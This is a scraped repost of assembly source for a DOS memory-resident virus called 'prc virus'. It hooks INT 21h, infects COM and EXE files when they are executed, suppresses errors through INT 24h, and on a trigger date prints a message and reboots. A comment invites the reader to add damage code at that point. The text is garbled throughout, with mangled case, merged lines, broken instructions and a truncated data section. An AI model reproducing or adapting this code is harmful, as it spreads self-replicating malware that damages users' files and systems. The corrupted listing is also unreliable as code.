2. Tech
  3. Resident Virus under a DOS DEMO

Resident Virus under a DOS DEMO

xiaoxiao2021-03-06  41

Resident Virus under a DOS DEMO

*****************************************; * a dos computer virus * ; * Name: prc virus *; * Infest Com or Exe file in dos system *; * Completed on May 2, 2000 *; ********************** *****************; *************************************** *************; * Save registers *; **************************************** ************ PUSHALL MACRO PUSH AX PUSH BX PUSH CX Push DX Push Si Push Di Push BP Push DS Push Esendm; *************** **************************; * RESTORE registers *; **************** *********************************** POPALL MACRO POP ES POP DS POP Pop Di Pop Si Pop DX Pop CX Pop Bx Pop Axendm; *** ***************************************; * My program start *; *** ************************************************ Code Segmentassume CS: CODE, DS: CODE

ORG 100HSTART: PUSH DS PUSH ES CALL BaseAddr; Si Saves The Base AddressBaseAddr: Pop Si Mov Ah, 2AH INT 21H CMP DL, 03H JNZ DonodAmage; ****************** ***************; * You can write Damage code Here *; *************** *********************************** MOV AH, 09H PUSH CS Pop DS Lea DX, [MSG-BaseAddr] [Si] Int 21h MOV AH 08H INT 21h INT 19H; *************************************************************** **; * if it is not the right day, do no damage *; ****************************************** *********** DONODAMAGE: CMP BYTE PTR CS: [COMOREXE-BaseAddr] [Si], Exefile JZ NOTESTOREFILEHEADER; ****************** ****************; * RESTORE Comfile header *; ****************** ************************ MOV CX, Word PTR CS: [SAVETHREEBYTES-BASEADDR] [Si] MOV DS: [100H], CX MOV CL , CS: [SAVETHREEBYTES 2-BaseAddr] [Si] MOV DS: [102H], ClNotrestorefileHeader: MOV AX, CS Add Word PTR CS: [Executeorgfile-BaseAddr 3] [Si], AX; Set Original Exefile Entrance Address XOR AX, AX MOV DS, AX MOV BX, DS: [21h * 4] Push DS: [21h * 4 2] POP ​​DS CMP BYTE PTR [BX], 90H; Check if the Virus Code Is in Memory or Not Jz Stoploading; ****** ***************************************; * Modify MCB to make room for the program *; ****************************************** MOV DX , ES DEC DX MOV DS, DX MOV AX, DS: [3] MOV BX, (Myvirussize 15) / 16 CMP AX, BX JB Stoploading Sub AX, BX MOV DS: [3], AX Add DX, AX INC DX ******************************************; * COPY THE Virus Code INTO MEMORY *; *************************************************** PUSH CS POP DS MOV ES, DX MOV BX, Si; Save Base Address Mov CX, Myvirussize Sub Si, BaseAddr-Start XOR DI, DI CLD Rep MOVSB; ********************* **********************;

* Modify Interrupt Vector Table *; *************************************************** XOR AX, AX MOV DS, AX PUSH DS: [21H * 4] POP ​​Word PTR ES: [Oldint21H-100H] Push DS: [21h * 4 2] Pop Word PTR ES: [Oldint 21h 2-100h] MOV AX , 2521H SUB DX, 10H MOV DS, DX MOV DX, OFFSET RESIDENTPART INT 21H; ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------- Stockloading: POP ES POP DSEXECUTEORGFILE:; Execute The Parasided EXE OR COM FILE RET DD 0; *********************** **********************************; * The Following Program Is ResiDent in Memory *; **** *********************************************************** *** ResidentPart: NOP; NOP IS The Signal of Residence of Virus CPMP AH, 4BH JZ Infect JMP CS: Oldint21HINFECT: PUSHALL; ************************* ********************** * Judge the file is a comfile or exec *; ******* ******************************************* MOV Al, '. 'MOV DI, DX MOV CX, 0FFFH Rep Scasb or Byte Ptr [Di], 20H MOV CS: COMOREXE, 0 CMP BYTE PTR [DI],' C ' JZ Lab1 Inc CS: ​​COMOREXELAB1:; **************************************************** ***************; * RESTORE 21H Interrupt Vector to Use Int 21h recommended *; ********************** *********************************** PUSH DS XOR AX, AX MOV DS, AX Push Word PTR CS: [Oldint21h] POP ​​DS: [21h * 4] Push Word PTR CS: [Oldint 21h 2] POP ​​DS: [21h * 4 2]; ***************** ****************; * Hook 24h to mask error process *; ************** *************************** PUSH DS: [24h * 4] Pop Word PTR CS: [Oldint24h] Push DS: [24h * 4 2] POP ​​Word PTR CS: [Oldint24H 2] MOV DS: [24h * 4], Offset Newint24h MOV AX, CS MOV DS: [24H * 4 2], AX Pop DS; ****** ***********************************

* Modify File Attribute *; *********************************************************** MOV AX, 4300H INT 21H JNC LAB2 JMP Endinfection3LAB2: PUSH CX; Remember to Pop IT OR CL, CX MOV AX, 4301H INT 21H JNC LAB3 JMP endinfection2; ************* *******************************; * Open the file *; *********** **************************************** LAB3: MOV AX, 3D42H INT 21H JNC LAB4 JMP endInfection2; ****** **************************; * Load file header *; ****** ********************************************** LAB4: MOV BX, AX Push DS; Remember to POP IT PUSH DX; Remember to POP IT MOV BP, SP SUB BP, 60H MOV DX, BP PUSH SS POP DS MOV CX, 1CH MOV AH, 3FH INT 21H; *************** **************************; * Get the file size *; ************** **************************** MOV AX, 4202H MOV CX, 0FFFFH MOV DX, -4 INT 21h Add Ax, 4 ADC DX, 0 Push AX Push DX; **************************************************** ; * Read Four Last Bytes of the file *; ************************************************* **** MOV AH, 3FH MOV CX, 4 LEA DX, [BP 1CH] INT 21h Pop DX POP AX; *********************** **********; * check if the file is infected or not *; ****************** ************************* PUSH CS Pop Es Lea Si, [BP 1CH] MOV DI, Offset Checkstring Mov CX, CheckstringLENT CLD Rep CMPSB JNZ Lab5 JMP endinfection1; *****************************************; * SAVE THE FIRST Three Bytes of the File *; ***************************************** ** LAB5: MOV CX, [BP] MOV Word PTR CS: Savethreebytes, CX MOV CL, [BP 02H] MOV CS: Savethreebytes 2, CMP CS: COMOREXE, EXEFILE JZ INFECTEXEFILE

*********************************; * DEAL with Comfile *; ********************************; push_ax_dx: Push AX Push DX MOV BYTE PTR [BP], 0E9H SUB AX, 3 MOV [BP 1], AX MOV DX, 100H XOR AX, AX JMP WRITECODE; ******************* ***************; * DEAL with EXEFILE *; ********************* *********************** Infectexefile: Mov Si, Ax; Compute How Many Bytes Needed to Align Para and Si, 0FH MOV CX, 16 SUB CX, Si and CX, 0FH MOV SI, CX Add Ax, CX ADC DX, 0; Push_ax_dx Push AX Push DX MOV CX, 16 DIV CX Sub AX, [BP 08H] SUB AX, 16; Compute New Code Segment XCHG [BP 16h], AX; Exchange New Code Segment and Old Code Segment MOV DX, [BP 14H]; Save Old Entry IP MOV WORD PTR [BP 14H], 100H; New IP = 100H SUB AX, [BP 16H]; Compute Difference Between Old Segment and New Segment; ****************************************************************************************************** **; * append the exec to align para *; *************************************** *************** PUSH AX MOV CX, SI JCXZ Writecode Mov AH, 40H INT 21h Pop AX; ****************** ****************; * WRITE The code INTO the file *; *************** *************************** WRITECODE: PUSH CS POP DS MOV BYTE PTECUTEORGFILE, 0EAH; Build The Instruction of "JMP xxxx: xxxx "MOV Word PTR EXECUTEORGFILE 1, DX; in ORDER TO EXECUTE THE ORINGAL FILE MOV WORD PTR EXECUTEORGFILE 3, AX MOV DX, 100H MOV CX, MyVirussize MOV AH, 40H INT 21h; ********* ***********************; * modify the exec, header *; ********** ******************************************* MOV AX, 4200H XOR CX, CX XOR DX, DX INT 21H;

------------------------------------------ POP_DX_AX: POP DX; POP TO Balance The Stack Pop AX; ---------------------------------------- CMP CS: COMOREXE, Comfile Jz Lab6 Add Ax, Myvirussize; Compute How Many Sectors The File Occupied ADC DX, 0 MOV CX, 512 DIV CX Inc AX MOV [BP 04H], AX MOV [BP 02H], DXLAB6: PUSH SS POP DS MOV AH, 40H MOV DX, BP MOV CX, 1CH INT 21H; ********************************************* *********; * Infection done *; ****************************************** ********* Endinfection1: POP DX POP Dsendinfection2: POP CX; ****************************************** ************; * close the file *; ***************************************** *********** MOV AH, 3EH INT 21h; ******************************************* ***********; * restore the file attribute *; *************************************** ************* Endinfection3: MOV AX, 4301H INT 21h; *************************************** *************; * let int 21h recommended point *; ************ *********************************************** XOR AX, AX MOV DS, AX MOV DS: [ 21h * 4], Offset ResidentPart Push CS Pop DS: [21h * 4 2]; **************************************** ********************; * RESTORE INT 24h *; ********************** ************************** PUSH WORD PTR CS: [Oldint24h] POP ​​DS: [24h * 4] Push Word PTR CS: [Oldint24h 2] POP ​​DS: [24H * 4 2] popall jmp dword PTR CS: Oldint21hnewint24h: Iret; ************************************** ***************; * Data Area *; *********************************** ************** Oldint21h DD? Oldint24h DD? COMOREXE DB? MSG DB 'this is a dos computer virus!', 0DH, 0AH, '$' Savethreebytes db 1eh, 06h, 0e8h Checkstring db '

转载请注明原文地址:https://www.9cbs.com/read-51421.html

9cbs

New Post(0)